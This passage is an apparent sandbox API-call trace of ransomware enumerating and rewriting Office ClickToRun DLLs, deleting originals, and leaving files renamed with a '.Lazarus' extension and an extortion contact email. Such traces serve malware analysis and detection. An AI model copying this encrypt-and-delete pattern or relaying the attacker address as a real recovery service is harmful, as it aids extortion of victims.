lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0xaa0, lpOverlapped=0x0) returned 1 [0092.170] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0092.170] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0092.170] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0xaa0, lpOverlapped=0x0) returned 1 [0092.170] CloseHandle (hObject=0x418) returned 1 [0092.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0092.438] CloseHandle (hObject=0x33c) returned 1 [0092.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0092.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0092.439] AreFileApisANSI () returned 1 [0092.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0092.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cae8 [0092.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8cae8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0092.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.446] GetFileType (hFile=0x33c) returned 0x1 [0092.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0092.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4aeb8 [0092.460] GetLastError () returned 0xb7 [0092.460] SetLastError (dwErrCode=0xb7) [0092.460] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0092.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aeb8 | out: hHeap=0x20000) returned 1 [0092.461] CloseHandle (hObject=0x33c) returned 1 [0092.461] AreFileApisANSI () returned 1 [0092.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0092.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d0d0 [0092.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8d0d0, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0092.461] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0092.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.463] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x336d8, dwReserved0=0x1, dwReserved1=0x0, cFileName="AppVIsvStreamingManager.dll", cAlternateFileName="APPVIS~4.DLL")) returned 1 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0092.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0092.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0092.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0092.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0092.464] AreFileApisANSI () returned 1 [0092.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll", lpUsedDefaultChar=0x0) returned 86 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0092.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0092.464] AreFileApisANSI () returned 1 [0092.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0092.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81a88 [0092.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x81a88, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 86 [0092.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.465] GetFileType (hFile=0x33c) returned 0x1 [0092.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0092.465] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.465] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.465] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.465] CloseHandle (hObject=0x33c) returned 1 [0092.466] AreFileApisANSI () returned 1 [0092.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0092.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81358 [0092.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 86 [0092.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.466] GetLastError () returned 0x20 [0092.466] GetLastError () returned 0x20 [0092.466] SetLastError (dwErrCode=0x20) [0092.466] GetLastError () returned 0x20 [0092.466] SetLastError (dwErrCode=0x20) [0092.466] GetLastError () returned 0x20 [0092.466] SetLastError (dwErrCode=0x20) [0092.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0092.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0092.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0092.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.466] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1566d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVIsvSubsystemController.dll", cAlternateFileName="AP213A~1.DLL")) returned 1 [0092.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0092.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0092.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0092.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0092.467] AreFileApisANSI () returned 1 [0092.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll", lpUsedDefaultChar=0x0) returned 89 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0092.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0092.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0092.468] AreFileApisANSI () returned 1 [0092.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0092.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0092.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 89 [0092.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.468] GetFileType (hFile=0x33c) returned 0x1 [0092.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.468] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.468] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.468] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.469] CloseHandle (hObject=0x33c) returned 1 [0092.469] AreFileApisANSI () returned 1 [0092.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0092.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0092.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 89 [0092.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.469] GetLastError () returned 0x20 [0092.469] GetLastError () returned 0x20 [0092.469] SetLastError (dwErrCode=0x20) [0092.469] GetLastError () returned 0x20 [0092.469] SetLastError (dwErrCode=0x20) [0092.469] GetLastError () returned 0x20 [0092.469] SetLastError (dwErrCode=0x20) [0092.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0092.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.469] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8fa12fdc, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0a8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="APPVIS~1.LAZ")) returned 1 [0092.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0092.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0092.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) 